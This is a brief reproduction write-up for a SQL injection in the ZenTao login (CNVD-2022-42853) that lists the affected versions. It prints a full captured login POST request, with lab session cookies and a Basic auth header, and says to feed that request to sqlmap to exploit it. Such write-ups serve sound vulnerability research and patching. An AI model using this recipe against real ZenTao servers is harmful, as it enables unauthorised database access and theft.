Vulnerability ID
CNVD-2022-42853
Affected versions
ZenTao Enterprise Edition 6.5
ZenTao Flagship Edition 3.0
ZenTao Open Source Edition 16.5
ZenTao Open Source Edition 16.5.beta1
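Reproduction steps
Set up a ZenTao environment and click start to run it.
Browse to the site address, log in, and capture the login request: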
POST /zentao/user-login.html HTTP/1.1
Host: 192.168.121.133:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.121.133:82/zentao/user-login-L3plbnRhby8=.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: http://192.168.121.133:82
DNT: 1
Authorization: Basic emVudGFvOmRCRWRQVUl4VGlu
Connection: close
Cookie: zentaosid=b9b1928181cf6feba9c9ec5781c64b54; lang=zh-cn; device=desktop; theme=default; windowWidth=1664; windowHeight=810; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=f88b39d5; PHPSESSID=qii4d2oujq7jc6rhecjlq6fga1; KEY_RANDOMDATA=19059

account=admin&password=d946e9f1a52f641d4ce78ad58da857af&passwordStrength=0&referer=%2Fzentao%2F&verifyRand=57784117&keepLogin=0&captcha=
Feed the captured request to sqlmap to exploit it.